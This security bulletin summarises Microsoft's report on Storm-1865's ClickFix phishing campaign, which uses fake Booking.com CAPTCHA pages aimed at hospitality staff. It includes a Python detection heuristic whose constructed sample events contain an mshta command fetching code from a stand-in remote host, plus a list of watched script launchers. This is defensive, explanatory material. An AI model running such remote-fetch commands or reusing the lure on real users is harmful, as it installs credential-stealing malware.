Microsoft Warns of ClickFix Phishing Campaign Targeting Hospitality Sector via Fake Booking[.]com
Microsoft Threat Intelligence has detected an active and evolving phishing campaign, attributed to the actor it tracks as Storm-1865, which commenced in December 2024 and persists as of February 2025. This campaign specifically targets organizations within the hospitality sector, with a focus on individuals most likely to interact with Booking[.]com. Geographically, targets span North America, Oceania, South and Southeast Asia, and various regions of Europe. The attackers employ a widely adopted social engineering tactic called ClickFix, designed to manipulate users into manually executing malicious commands. This technique involves presenting fake error messages or prompts that instruct users to copy, paste, and launch commands within the Windows Run window to “fix” the issue, which ultimately leads to the download and execution of multiple malware families. These malware families include XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT, each possessing capabilities for credential theft and financial data exfiltration.
The campaign leverages emails that impersonate Booking[.]com, with varying content such as fake guest reviews, prospective guest inquiries, and account verification prompts. These emails contain links or PDF attachments that redirect users to a fraudulent webpage mimicking Booking[.]com, complete with a fake CAPTCHA to enhance the illusion of legitimacy. This fake CAPTCHA is the point where the ClickFix technique is deployed. The pasted command downloads and launches malicious code through mshta.exe. The code retrieved via mshta.exe varies, at times including PowerShell, JavaScript, and portable executable content, all aimed at facilitating financial fraud. Storm-1865 has a history of targeting users of online platforms, including hotel guests via Booking[.]com in 2023 and e-commerce buyers in 2024, demonstrating a pattern of adapting and expanding its attack vectors.
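The detection angle that follows from the description above is that a command pasted into the Run window is spawned by explorer.exe, and in this campaign it invokes mshta.exe against a remote location. The Python triage heuristic below is an added example, not code from Microsoft or from this advisory; it assumes process-creation telemetry (Sysmon Event ID 1 style) reduced to parent, image, cmdline and user fields, and the sample events and the captcha-check.example domain are constructed.

```python
import re
from typing import Dict, List

# ClickFix lures tell the victim to paste a command into the Windows Run window (Win+R).
# Anything started that way has explorer.exe as its parent; in the Storm-1865 campaign
# the pasted command runs mshta.exe with a remote URL, so we look for both signals.
LAUNCHERS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
RUN_DIALOG_PARENT = "explorer.exe"
# http(s)/ftp URL or a UNC path (\\host\share) anywhere in the command line
REMOTE_SOURCE = re.compile(r"(?:https?|ftp)://[^\s'\"]+|\\\\[^\\\s]+\\", re.IGNORECASE)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (e.g. the full mshta.exe path -> 'mshta.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def clickfix_indicators(event: Dict[str, str]) -> List[str]:
    """Return the ClickFix indicators matched by one process-creation event (empty = benign)."""
    image, parent = basename(event["image"]), basename(event["parent"])
    cmdline = event["cmdline"]
    reasons = []
    if image == "mshta.exe" and REMOTE_SOURCE.search(cmdline):
        reasons.append("mshta.exe fetching content from a remote location")
    if image in LAUNCHERS and parent == RUN_DIALOG_PARENT and REMOTE_SOURCE.search(cmdline):
        reasons.append("script host spawned by explorer.exe with a remote source (Run-dialog paste)")
    return reasons

def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Keep only the events that match at least one indicator, with the reasons attached."""
    hits = []
    for ev in events:
        reasons = clickfix_indicators(ev)
        if reasons:
            hits.append({"cmdline": ev["cmdline"], "user": ev["user"], "reasons": reasons})
    return hits

# Constructed sample events (not real telemetry): one ClickFix-style launch, three benign ones.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://captcha-check.example/verify", "user": r"HOTEL\frontdesk"},
    {"parent": r"C:\Windows\System32\msiexec.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"', "user": "NT AUTHORITY\\SYSTEM"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad C:\Users\frontdesk\notes.txt", "user": r"HOTEL\frontdesk"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\backup.ps1", "user": r"HOTEL\frontdesk"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["user"], "|", hit["cmdline"], "|", "; ".join(hit["reasons"]))
```

The installer-launched local .hta in the second event is the main false-positive case for a bare "mshta.exe ran" rule, which is why both the parent and the remote-source condition are checked.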
Security Officer Comments:
This phishing campaign by Storm-1865 highlights some critical trends in cybersecurity. The targeting of the hospitality sector, particularly those who work with Booking[.]com, demonstrates the attackers' strategic approach to maximize their chances of success. By impersonating a trusted platform and leveraging the time-sensitive nature of the hospitality industry, they increase the likelihood of users falling victim to the scam.
The ClickFix technique has gained significant traction and widespread adoption among threat actors due to its surprising effectiveness, as described in Group-IB’s recent analysis. Storm-1865's incorporation of ClickFix into its attacks highlights the importance of organizations remaining vigilant, proactively monitoring for new threats, and continuously updating their security measures in response. It also underscores the importance of security awareness training that goes beyond simply recognizing phishing emails. Users need to be educated about the dangers of blindly copying and pasting commands from untrusted sources on their machines, even when those commands are presented within what appears to be a legitimate page or interface.
The use of multiple malware families such as Lumma Stealer indicates the attackers' substantial arsenal of advanced malware and their desire to maximize their potential gains. These malware types are known for their credential harvesting and remote access capabilities, which align directly with the campaign's financial fraud objectives. The adversary’s persistence and the effectiveness of its methods are underscored by the fact that this activity has been ongoing since at least 2023, necessitating that organizations establish an adaptive security posture.
Suggested Corrections:
IOCs are available here.
Link(s):
https://thehackernews.com/2025/03/microsoft-warns-of-clickfix-phishing.html
https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/